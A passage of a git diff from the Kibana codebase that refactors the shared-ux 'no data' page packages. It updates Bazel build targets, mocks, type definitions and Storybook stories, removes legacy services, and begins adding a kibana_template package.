b/packages/shared-ux/link/redirect_app/mocks/package.json index 2281680755a9c..adf441fb3d134 100644 --- a/packages/shared-ux/link/redirect_app/mocks/package.json +++ b/packages/shared-ux/link/redirect_app/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" -} \ No newline at end of file +} diff --git a/packages/shared-ux/link/redirect_app/mocks/src/jest.ts b/packages/shared-ux/link/redirect_app/mocks/src/jest.ts index 57e6650d17752..1af5aa6e72a11 100644 --- a/packages/shared-ux/link/redirect_app/mocks/src/jest.ts +++ b/packages/shared-ux/link/redirect_app/mocks/src/jest.ts @@ -6,31 +6,53 @@ * Side Public License, v 1. */ -import { Subject } from 'rxjs'; +import { Observable } from 'rxjs'; import { RedirectAppLinksServices, RedirectAppLinksKibanaDependencies, } from '@kbn/shared-ux-link-redirect-app-types'; +type Params = Pick; + +const defaultParams: Params = { + navigateToUrl: jest.fn(), +}; + /** * Returns the Jest-compatible service abstractions for the `NoDataCard` Provider. */ -export const getRedirectAppLinksServicesMock = () => { +export const getRedirectAppLinksServicesMock = ( + params?: Partial +): RedirectAppLinksServices => { + const navigateToUrl = + params && params.navigateToUrl !== undefined + ? params.navigateToUrl + : defaultParams.navigateToUrl; + const services: RedirectAppLinksServices = { - navigateToUrl: jest.fn(), + navigateToUrl, currentAppId: 'currentAppId', }; return services; }; -export const getRedirectAppLinksKibanaDependenciesMock = (): RedirectAppLinksKibanaDependencies => { +export const getRedirectAppLinksKibanaDependenciesMock = ( + params?: Partial +): RedirectAppLinksKibanaDependencies => { + const navigateToUrl = + params && params.navigateToUrl !== undefined + ? params.navigateToUrl + : defaultParams.navigateToUrl; + return { coreStart: { application: { - currentAppId$: new Subject(), - navigateToUrl: jest.fn(), + currentAppId$: new Observable((subscriber) => { + subscriber.next('currentAppId'); + }), + navigateToUrl, }, }, }; diff --git a/packages/shared-ux/link/redirect_app/mocks/tsconfig.json b/packages/shared-ux/link/redirect_app/mocks/tsconfig.json index 041c59b490ec0..dc96ec41f9035 100644 --- a/packages/shared-ux/link/redirect_app/mocks/tsconfig.json +++ b/packages/shared-ux/link/redirect_app/mocks/tsconfig.json @@ -10,9 +10,11 @@ "types": [ "jest", "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx b/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx index 0e6a4261c8c2d..5c9c5923bfdc6 100644 --- a/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx +++ b/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx @@ -7,7 +7,6 @@ */ import React from 'react'; -import { action } from '@storybook/addon-actions'; import { AnalyticsNoDataPageStorybookMock } from '@kbn/shared-ux-page-analytics-no-data-mocks'; import type { AnalyticsNoDataPageStorybookParams } from '@kbn/shared-ux-page-analytics-no-data-mocks'; @@ -18,7 +17,7 @@ import mdx from '../README.mdx'; const mock = new AnalyticsNoDataPageStorybookMock(); export default { - title: 'No Data/Analytics Page', + title: 'No Data/Page/Kibana', description: 'An Analytics-specific version of KibanaNoDataPage.', parameters: { docs: { @@ -27,7 +26,7 @@ export default { }, }; -export const AnalyticsNoDataPage = (params: AnalyticsNoDataPageStorybookParams) => { +export const Analytics = (params: AnalyticsNoDataPageStorybookParams) => { return ( @@ -35,22 +34,4 @@ export const AnalyticsNoDataPage = (params: AnalyticsNoDataPageStorybookParams) ); }; -AnalyticsNoDataPage.argTypes = mock.getArgumentTypes(); - -export const LoadingState = (params: AnalyticsNoDataPageStorybookParams) => { - // Simulate loading with a Promise that doesn't resolve. - const dataCheck = () => new Promise((_reject, _resolve) => {}); - - const services = { - ...mock.getServices(params), - hasESData: dataCheck, - hasUserDataView: dataCheck, - hasDataView: dataCheck, - }; - - return ( - - - - ); -}; +Analytics.argTypes = mock.getArgumentTypes(); diff --git a/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel b/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel index 6d78e72892bfc..1600004860f88 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/page/analytics_no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,7 +46,9 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//react", "//packages/shared-ux/page/kibana_no_data/mocks", + "//packages/shared-ux/storybook/mock", ] # In this array place dependencies necessary to build the types, which will include the @@ -50,10 +61,12 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", "//packages/shared-ux/page/analytics_no_data/types:npm_module_types", "//packages/shared-ux/page/kibana_no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -63,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -88,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js b/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js deleted file mode 100644 index ba5df95ec80fb..0000000000000 --- a/packages/shared-ux/page/analytics_no_data/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/page/analytics_no_data/mocks'], -}; diff --git a/packages/shared-ux/page/analytics_no_data/mocks/package.json b/packages/shared-ux/page/analytics_no_data/mocks/package.json index 30850ab7355ab..6fc9704e831f1 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/package.json +++ b/packages/shared-ux/page/analytics_no_data/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json b/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json +++ b/packages/shared-ux/page/analytics_no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel b/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel index 2fc986d65c1a4..7b1e16f9db829 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel +++ b/packages/shared-ux/page/kibana_no_data/impl/BUILD.bazel @@ -44,9 +44,8 @@ RUNTIME_DEPS = [ "@npm//@emotion/react", "@npm//react", "//packages/kbn-i18n", - "//packages/kbn-shared-ux-components", - "//packages/kbn-shared-ux-services", "//packages/shared-ux/prompt/no_data_views/impl", + "//packages/shared-ux/page/no_data_config/impl", ] # In this array place dependencies necessary to build the types, which will include the @@ -67,10 +66,10 @@ TYPES_DEPS = [ "@npm//@types/react", "//packages/kbn-ambient-ui-types", "//packages/kbn-i18n:npm_module_types", - "//packages/kbn-shared-ux-components:npm_module_types", - "//packages/kbn-shared-ux-services:npm_module_types", "//packages/shared-ux/prompt/no_data_views/impl:npm_module_types", - "//packages/shared-ux/page/kibana_no_data/types:npm_module_types", + "//packages/shared-ux/page/no_data_config/impl:npm_module_types", + "//packages/shared-ux/page/no_data_config/types", + "//packages/shared-ux/page/kibana_no_data/types", ] jsts_transpiler( diff --git a/packages/shared-ux/page/kibana_no_data/impl/README.mdx b/packages/shared-ux/page/kibana_no_data/impl/README.mdx index bc5dc37ac679a..f74adf2465e3b 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/README.mdx +++ b/packages/shared-ux/page/kibana_no_data/impl/README.mdx @@ -14,7 +14,7 @@ The `KibanaNoDataPage` connected component uses: - `hasUserDataView` and `hasData` API from the `HasData` service in the `data_views` plugin to check for existence of data an data views. - `onDataViewCreated` callback once a data view has been created. -- (noDataConfig)[https://github.com/elastic/kibana/blob/main/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts] as configuration for the page in case of no data. +- (noDataConfig)[https://github.com/elastic/kibana/blob/main/packages/shared-ux/page/no_data/types/index.d.ts] as configuration for the page in case of no data. ## API diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx index f38b079dffec7..60cc78d95215c 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.stories.tsx @@ -17,7 +17,7 @@ import { KibanaNoDataPageProvider } from './services'; import mdx from '../README.mdx'; export default { - title: 'No Data/Kibana Page', + title: 'No Data/Page/Kibana', description: 'A component to display when there is no data available', parameters: { docs: { @@ -28,7 +28,7 @@ export default { const mock = new KibanaNoDataPageStorybookMock(); -export const KibanaNoDataPage = (params: KibanaNoDataPageStorybookParams) => { +export const Kibana = (params: KibanaNoDataPageStorybookParams) => { return ( @@ -36,7 +36,7 @@ export const KibanaNoDataPage = (params: KibanaNoDataPageStorybookParams) => { ); }; -KibanaNoDataPage.argTypes = mock.getArgumentTypes(); +Kibana.argTypes = mock.getArgumentTypes(); export const LoadingState = (params: KibanaNoDataPageStorybookParams) => { // Simulate loading with a Promise that doesn't resolve. diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx index 7a0e0cd7e4f00..c15a5c061dd1b 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.test.tsx @@ -12,7 +12,7 @@ import { act } from 'react-dom/test-utils'; import { EuiLoadingElastic } from '@elastic/eui'; import { mountWithIntl } from '@kbn/test-jest-helpers'; import { NoDataViewsPrompt } from '@kbn/shared-ux-prompt-no-data-views'; -import { NoDataConfigPage } from '@kbn/shared-ux-components'; +import { NoDataConfigPage } from '@kbn/shared-ux-page-no-data-config'; import { getKibanaNoDataPageServicesMock } from '@kbn/shared-ux-page-kibana-no-data-mocks'; import { KibanaNoDataPage } from './kibana_no_data_page'; @@ -43,7 +43,7 @@ describe('Kibana No Data Page', () => { }); test('renders NoDataConfigPage', async () => { - const services = getKibanaNoDataPageServicesMock({ config: { ...config, hasESData: false } }); + const services = getKibanaNoDataPageServicesMock(config); const component = mountWithIntl( @@ -58,7 +58,7 @@ describe('Kibana No Data Page', () => { }); test('renders NoDataViews', async () => { - const services = getKibanaNoDataPageServicesMock({ config: { ...config, hasESData: true } }); + const services = getKibanaNoDataPageServicesMock({ ...config, hasESData: true }); const component = mountWithIntl( diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx index f2ac573232f34..73726d7b82eaa 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/kibana_no_data_page.tsx @@ -7,7 +7,7 @@ */ import React, { useEffect, useState } from 'react'; import { EuiLoadingElastic } from '@elastic/eui'; -import { NoDataConfigPage } from '@kbn/shared-ux-components'; +import { NoDataConfigPage } from '@kbn/shared-ux-page-no-data-config'; import { NoDataViewsPrompt } from '@kbn/shared-ux-prompt-no-data-views'; import { KibanaNoDataPageProps } from '@kbn/shared-ux-page-kibana-no-data-types'; diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx deleted file mode 100644 index 2a9580bb74684..0000000000000 --- a/packages/shared-ux/page/kibana_no_data/impl/src/legacy_services.tsx +++ /dev/null @@ -1,49 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { SharedUxServicesProvider as LegacyServicesProvider } from '@kbn/shared-ux-services'; -export type { SharedUxServices as LegacyServices } from '@kbn/shared-ux-services'; - -import { SharedUxServices as LegacyServices } from '@kbn/shared-ux-services'; -import type { KibanaNoDataPageServices } from '@kbn/shared-ux-page-kibana-no-data-types'; - -/** - * This list is temporary, a stop-gap as we migrate to a package-based architecture, where - * services are not collected in a single package. In order to make the transition, this - * interface is intentionally "flat". - * - * Expect this list to dwindle to zero as `@kbn/shared-ux-components` are migrated to their - * own packages, (and `@kbn/shared-ux-services` is removed). - */ -export const getLegacyServices = (services: KibanaNoDataPageServices): LegacyServices => ({ - application: { - currentAppId$: services.currentAppId$, - navigateToUrl: services.navigateToUrl, - }, - data: { - hasESData: services.hasESData, - hasDataView: services.hasDataView, - hasUserDataView: services.hasUserDataView, - }, - docLinks: { - dataViewsDocLink: services.dataViewsDocLink, - }, - editors: { - openDataViewEditor: services.openDataViewEditor, - }, - http: { - addBasePath: services.addBasePath, - }, - permissions: { - canAccessFleet: services.canAccessFleet, - canCreateNewDataView: services.canCreateNewDataView, - }, - platform: { - setIsFullscreen: services.setIsFullscreen, - }, -}); diff --git a/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx b/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx index 0aab90ce9f504..3ebab02d63790 100644 --- a/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx +++ b/packages/shared-ux/page/kibana_no_data/impl/src/services.tsx @@ -15,13 +15,12 @@ import { import { NoDataCardProvider, NoDataCardKibanaProvider } from '@kbn/shared-ux-card-no-data'; import { + Services, KibanaNoDataPageServices, KibanaNoDataPageKibanaDependencies, } from '@kbn/shared-ux-page-kibana-no-data-types'; -import { LegacyServicesProvider, getLegacyServices } from './legacy_services'; - -const KibanaNoDataPageContext = React.createContext(null); +const KibanaNoDataPageContext = React.createContext(null); /** * A Context Provider that provides services to the component. @@ -29,15 +28,17 @@ const KibanaNoDataPageContext = React.createContext = ({ children, ...services -}) => ( - - - - {children} - - - -); +}) => { + const { hasESData, hasUserDataView } = services; + + return ( + + + {children} + + + ); +}; /** * Kibana-specific Provider that maps dependencies to services. @@ -46,27 +47,16 @@ export const KibanaNoDataPageKibanaProvider: FC { - const { coreStart, dataViewEditor, dataViews } = dependencies; - const value: KibanaNoDataPageServices = { - addBasePath: coreStart.http.basePath.prepend, - canAccessFleet: coreStart.application.capabilities.navLinks.integrations, - canCreateNewDataView: dataViewEditor.userPermissions.editDataView(), - currentAppId$: coreStart.application.currentAppId$, - dataViewsDocLink: coreStart.docLinks.links.indexPatterns?.introduction, - hasDataView: dataViews.hasData.hasDataView, + const { dataViews } = dependencies; + const value: Services = { hasESData: dataViews.hasData.hasESData, hasUserDataView: dataViews.hasData.hasUserDataView, - navigateToUrl: coreStart.application.navigateToUrl, - openDataViewEditor: dataViewEditor.openEditor, - setIsFullscreen: (isVisible: boolean) => coreStart.chrome.setIsVisible(isVisible), }; return ( - - {children} - + {children} ); diff --git a/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel b/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel index 2c195edb6de03..7f8c4c03fc92d 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/page/kibana_no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,8 +46,10 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ - "//packages/shared-ux/prompt/no_data_views/mocks", + "@npm//react", "//packages/shared-ux/card/no_data/mocks", + "//packages/shared-ux/prompt/no_data_views/mocks", + "//packages/shared-ux/storybook/mock", ] # In this array place dependencies necessary to build the types, which will include the @@ -51,12 +62,14 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/card/no_data/mocks:npm_module_types", "//packages/shared-ux/page/kibana_no_data/types:npm_module_types", - "//packages/kbn-shared-ux-components:npm_module_types", + "//packages/shared-ux/page/no_data/types", "//packages/shared-ux/prompt/no_data_views/mocks:npm_module_types", - "//packages/shared-ux/card/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -66,6 +79,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -91,7 +112,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js b/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js deleted file mode 100644 index 4c71cbdc32e91..0000000000000 --- a/packages/shared-ux/page/kibana_no_data/mocks/jest.config.js +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/page/kibana_no_data/mocks'], -}; diff --git a/packages/shared-ux/page/kibana_no_data/mocks/package.json b/packages/shared-ux/page/kibana_no_data/mocks/package.json index 988bdc1d33aca..f134da02e430f 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/package.json +++ b/packages/shared-ux/page/kibana_no_data/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" -} +} \ No newline at end of file diff --git a/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts b/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts index 33f26bafbd33d..5f2f6b309e56c 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts +++ b/packages/shared-ux/page/kibana_no_data/mocks/src/jest.ts @@ -9,33 +9,34 @@ import { getNoDataCardServicesMock } from '@kbn/shared-ux-card-no-data-mocks'; import { KibanaNoDataPageServices } from '@kbn/shared-ux-page-kibana-no-data-types'; import { getNoDataViewsPromptServicesMock } from '@kbn/shared-ux-prompt-no-data-views-mocks'; -import { mockServicesFactory, MockServicesFactoryParams } from '@kbn/shared-ux-services'; + +interface Params { + hasESData: boolean; + hasUserDataView: boolean; +} + +const defaultParams = { + hasESData: true, + hasUserDataView: true, +}; /** * Returns the Jest-compatible service abstractions for the `KibanaNoDataPage` Provider. */ -export const getServicesMock = (params?: MockServicesFactoryParams) => { - const { canCreateNewDataView, dataViewsDocLink, openDataViewEditor } = - getNoDataViewsPromptServicesMock(); - - const { addBasePath, canAccessFleet } = getNoDataCardServicesMock(); +export const getServicesMock = (params?: Partial) => { + const hasESData = + params && params.hasESData !== undefined ? params.hasESData : defaultParams.hasESData; - const { application, data, docLinks, editors, http, permissions, platform } = - mockServicesFactory(params); + const hasUserDataView = + params && params.hasUserDataView !== undefined + ? params.hasUserDataView + : defaultParams.hasUserDataView; const services: KibanaNoDataPageServices = { - ...application, - ...data, - ...docLinks, - ...editors, - ...http, - ...permissions, - ...platform, - canCreateNewDataView, - dataViewsDocLink, - openDataViewEditor, - addBasePath, - canAccessFleet, + ...getNoDataCardServicesMock(), + ...getNoDataViewsPromptServicesMock(), + hasESData: async () => hasESData, + hasUserDataView: async () => hasUserDataView, }; return services; diff --git a/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts b/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts index 32dcdfe486580..1f4a7453e59b6 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts +++ b/packages/shared-ux/page/kibana_no_data/mocks/src/storybook.ts @@ -6,13 +6,14 @@ * Side Public License, v 1. */ -import { servicesFactory } from '@kbn/shared-ux-storybook'; +import { action } from '@storybook/addon-actions'; + import { AbstractStorybookMock, ArgumentParams } from '@kbn/shared-ux-storybook-mock'; import type { KibanaNoDataPageServices, KibanaNoDataPageProps, } from '@kbn/shared-ux-page-kibana-no-data-types'; -import type { NoDataPageProps } from '@kbn/shared-ux-components'; +import type { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; import { NoDataViewsPromptStorybookMock, @@ -23,7 +24,6 @@ import { NoDataCardStorybookMock, NoDataCardStorybookParams, } from '@kbn/shared-ux-card-no-data-mocks'; -import { action } from '@storybook/addon-actions'; type PropArguments = Pick; type ServiceArguments = Pick; @@ -83,22 +83,11 @@ export class StorybookMock extends AbstractStorybookMock< } getServices(params: Params): KibanaNoDataPageServices { - // Workaround to leverage the services package. - const { application, data, docLinks, editors, http, permissions, platform } = - servicesFactory(params); - return { - ...application, - ...data, - ...docLinks, - ...editors, - ...http, - ...permissions, - ...platform, - hasESData: () => params.hasESData, - hasUserDataView: () => params.hasUserDataView, ...noDataCardMock.getServices(params), ...noDataViewsMock.getServices(params), + hasESData: () => params.hasESData, + hasUserDataView: () => params.hasUserDataView, }; } } diff --git a/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json b/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json +++ b/packages/shared-ux/page/kibana_no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/page/kibana_no_data/types/index.d.ts b/packages/shared-ux/page/kibana_no_data/types/index.d.ts index cfa1da12ccedf..18fe5499e93c3 100644 --- a/packages/shared-ux/page/kibana_no_data/types/index.d.ts +++ b/packages/shared-ux/page/kibana_no_data/types/index.d.ts @@ -6,109 +6,44 @@ * Side Public License, v 1. */ -import { Observable } from 'rxjs'; -import { NoDataPageProps } from '@kbn/shared-ux-components'; +import { NoDataPageProps } from '@kbn/shared-ux-page-no-data-types'; -/** - * TODO: `DataView` is a class exported by `src/plugins/data_views/public`. Since this service - * is contained in this package-- and packages can only depend on other packages and never on - * plugins-- we have to set this to `unknown`. If and when `DataView` is exported from a - * stateless package, we can remove this. - * - * @see: https://github.com/elastic/kibana/issues/127695 - */ -type DataView = unknown; - -/** - * A subset of the `DataViewEditorOptions` interface relevant to this component. - * - * @see: src/plugins/data_view_editor/public/types.ts - */ -interface DataViewEditorOptions { - /** Handler to be invoked when the Data View Editor completes a save operation. */ - onSave: (dataView: DataView) => void; -} +import { + NoDataViewsPromptServices, + NoDataViewsPromptKibanaDependencies, +} from '@kbn/shared-ux-prompt-no-data-views-types'; +import { + NoDataCardServices, + NoDataCardKibanaDependencies, +} from '@kbn/shared-ux-card-no-data-types'; -/** - * A list of Services that are consumed by this component. - * - * This list is temporary, a stopgap as we migrate to a package-based architecture, where - * services are not collected in a single package. In order to make the transition, this - * interface is intentionally "flat". - * - * Expect this list to dwindle to zero as `@kbn/shared-ux-components` are migrated to their - * own packages, (and `@kbn/shared-ux-services` is removed). - */ -export interface KibanaNoDataPageServices { +export interface Services { /** True if the cluster contains data, false otherwise. */ hasESData: () => Promise; /** True if Kibana instance contains user-created data view, false otherwise. */ hasUserDataView: () => Promise; - - // Provided to Legacy Services, not relevant to this component. Will be removed. - /** Append the server base path to a relative URL. */ - addBasePath: (url: string) => string; - /** True if the user has permission to access Fleet, false otherwise. */ - canAccessFleet: boolean; - /** True if the user has permission to create a new Data View, false otherwise. */ - canCreateNewDataView: boolean; - /** Observable storing the active, current application ID. */ - currentAppId$: Observable; - /** A link to information about Data Views in Kibana */ - dataViewsDocLink: string; - /** True if Kibana instance contains any data view, including system-created ones. */ - hasDataView: () => Promise; - /** Use Kibana to navigate async to a different URL. */ - navigateToUrl: (url: string) => Promise | void; - /** A method to open the Data View Editor flow. */ - openDataViewEditor: (options: DataViewEditorOptions) => () => void; - /** Set the Kibana chrome and browser to full screen mode. */ - setIsFullscreen: (isFullscreen: boolean) => void; } /** - * An interface containing a collection of Kibana plugins and services required to - * render this component and its dependencies. + * A list of Services that are consumed by this component.. */ -export interface KibanaNoDataPageKibanaDependencies { - coreStart: { - application: { - capabilities: { - navLinks: Record; - }; - currentAppId$: Observable; - navigateToUrl: (url: string) => Promise; - }; - chrome: { - setIsVisible: (isVisible: boolean) => void; - }; - docLinks: { - links: { - indexPatterns: { - introduction: string; - }; - }; - }; - http: { - basePath: { - prepend: (url: string) => string; - }; - }; - }; +export type KibanaNoDataPageServices = Services & NoDataCardServices & NoDataViewsPromptServices; + +export interface KibanaDependencies { dataViews: { hasData: { - hasDataView: () => Promise; hasESData: () => Promise; hasUserDataView: () => Promise; }; }; - dataViewEditor: { - openEditor: (options: DataViewEditorOptions) => () => void; - userPermissions: { - editDataView: () => boolean; - }; - }; } +/** + * An interface containing a collection of Kibana plugins and services required to + * render this component and its dependencies. + */ +export type KibanaNoDataPageKibanaDependencies = KibanaDependencies & + NoDataViewsPromptKibanaDependencies & + NoDataCardKibanaDependencies; /** * Props for `KibanaNoDataPage`. diff --git a/packages/shared-ux/page/kibana_template/impl/BUILD.bazel b/packages/shared-ux/page/kibana_template/impl/BUILD.bazel new file mode 100644 index 0000000000000..8e27df56eadf2 --- /dev/null +++ b/packages/shared-ux/page/kibana_template/impl/BUILD.bazel @@ -0,0 +1,137 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-kibana-template" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + "src/**/*.mdx", + ], + exclude = [ + "**/*.test.*", + "**/*.stories.*", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/page/no_data_config/impl", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. "//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "//packages/shared-ux/page/no_data_config/impl:npm_module_types", + "//packages/shared-ux/page/kibana_template/types", + "//packages/kbn-ambient-ui-types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, + additional_args = [ + "--copy-files", + "--quiet" + ], +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = 